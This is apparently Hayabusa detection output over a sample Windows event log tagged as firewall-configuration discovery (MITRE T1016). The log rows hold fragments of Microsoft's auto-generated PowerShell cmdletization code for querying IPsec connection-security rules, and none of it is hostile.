Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHas",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"BeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerSh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 